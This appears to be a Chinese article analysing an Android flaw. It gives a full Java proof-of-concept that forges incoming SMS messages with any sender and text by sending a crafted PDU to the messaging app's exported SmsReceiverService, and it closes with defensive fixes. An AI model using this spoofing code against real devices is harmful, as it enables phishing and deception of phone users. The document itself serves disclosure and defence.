代码实现
package com.smstrick;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

/**
 * Demo activity from the article: reads a sender number and a message body from two
 * text fields and, on button press, passes a locally assembled SMS PDU to the stock
 * messaging app's {@code SmsReceiverService}.
 *
 * <p>Security note for reviewers: the article states that the caller needs no permission.
 * The delivery can only work if the target service accepts a {@code startService} call
 * from another package, i.e. it is exported and not guarded by a permission. The defence
 * belongs on the receiving side: declare such services {@code android:exported="false"}
 * or protect them with a signature-level permission, and never treat the action string
 * of an incoming intent as proof of where it came from.
 */
public class SMSTrickActivity extends Activity implements OnClickListener {

    /** Inflates the main layout and registers this activity as the button's click handler. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        findViewById(R.id.button1).setOnClickListener(this);
    }

    /**
     * Reads both text fields and forwards their contents to {@link #createFakeSms}.
     *
     * @param v the clicked view (not used)
     */
    public void onClick(View v) {
        EditText numberField = (EditText) findViewById(R.id.editText1);
        EditText messageField = (EditText) findViewById(R.id.editText2);

        String typedNumber = numberField.getText().toString();
        String message = messageField.getText().toString();

        // The sender must not be blank, so an empty field falls back to a fixed number.
        String sender = typedNumber.equals("") ? "123456" : typedNumber;

        createFakeSms(this.getApplicationContext(), sender, message);
    }

    /**
     * Assembles a PDU byte array from {@code sender}, the current time and {@code body},
     * then starts the messaging app's receiver service with it.
     *
     * <p>Failure handling is best-effort only: if the reflective encoder call fails, the
     * exception is printed and the PDU is finalised without a body; if an
     * {@link IOException} occurs, {@code pdu} stays {@code null}. In both cases the
     * intent is still sent.
     *
     * @param context context used for {@code startService}
     * @param sender  number written into the PDU's sender field
     * @param body    message text, packed by the platform's GSM 7-bit encoder
     */
    private static void createFakeSms(Context context, String sender, String body) {
        //Source: http://stackoverflow.com/a/12338541
        //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        byte[] serviceCentre = PhoneNumberUtils.networkPortionToCalledPartyBCD("0000000000");
        byte[] senderBcd = PhoneNumberUtils.networkPortionToCalledPartyBCD(sender);
        int serviceCentreLength = serviceCentre.length;

        // Seven timestamp octets, each passed through the nibble swap in reverseByte;
        // the last one is the UTC offset counted in quarter hours.
        Calendar now = new GregorianCalendar();
        byte[] timestamp = {
            reverseByte((byte) (now.get(Calendar.YEAR))),
            reverseByte((byte) (now.get(Calendar.MONTH) + 1)),
            reverseByte((byte) (now.get(Calendar.DAY_OF_MONTH))),
            reverseByte((byte) (now.get(Calendar.HOUR_OF_DAY))),
            reverseByte((byte) (now.get(Calendar.MINUTE))),
            reverseByte((byte) (now.get(Calendar.SECOND))),
            reverseByte((byte) ((now.get(Calendar.ZONE_OFFSET) + now.get(Calendar.DST_OFFSET))
                    / (60 * 1000 * 15))),
        };

        byte[] pdu = null;
        try {
            Log.d("ice", "test one");
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            out.write(serviceCentreLength);
            out.write(serviceCentre);
            out.write(0x04); // NOTE(review): presumably the first octet of the deliver header; confirm against the SMS PDU spec
            out.write((byte) sender.length());
            out.write(senderBcd);
            out.write(0x00);
            out.write(0x00); // encoding: 0 for default 7bit
            out.write(timestamp);
            try {
                // GsmAlphabet lives in an internal (non-SDK) package, hence the reflective lookup.
                Class<?> gsmAlphabet = Class.forName("com.android.internal.telephony.GsmAlphabet");
                Method packer = gsmAlphabet.getMethod("stringToGsm7BitPacked", String.class);
                packer.setAccessible(true);
                byte[] packedBody = (byte[]) packer.invoke(null, body);
                out.write(packedBody);
            } catch (Exception e) {
                e.printStackTrace();
            }
            pdu = out.toByteArray();
        } catch (IOException e) {
            e.printStackTrace();
        }

        // The action string is attached to an explicit-component service start. Nothing in
        // this file shows the receiving service checking who the caller is; a service
        // reachable this way has to be exported without a permission requirement.
        Intent intent = new Intent();
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);
    }

    /**
     * Swaps the high and low nibble of {@code b}.
     *
     * @param b input byte
     * @return {@code b} with its two 4-bit halves exchanged
     */
    private static byte reverseByte(byte b) {
        int highToLow = (b & 0xF0) >> 4;
        int lowToHigh = (b & 0x0F) << 4;
        return (byte) (highToLow | lowToHigh);
    }
}

实质分析：核心在于应用自行构造了系统的
        // Excerpt of the delivery step: the intent carries the SMS-received action string
        // and is addressed to the messaging app's service by explicit component name.
        // For the receiving side: a service that can be started like this from another
        // package is exported without a permission check; android:exported="false" or a
        // signature-level android:permission on the service closes this path.
        Intent intent = new Intent();
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");
        // The "pdus" extra holds a one-element array with the locally built PDU.
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);

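收到短信的 intent，并通过 startService 直接投递给 com.android.mms 的 SmsReceiverService，从而伪造了短信，而且调用方不需要申请任何权限。这说明该服务对外导出且没有用权限保护：它仅凭 intent 的 action 就把数据当作系统收到的短信处理。防御上应将此类服务设为不导出（android:exported="false"），或用签名级权限加以保护。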
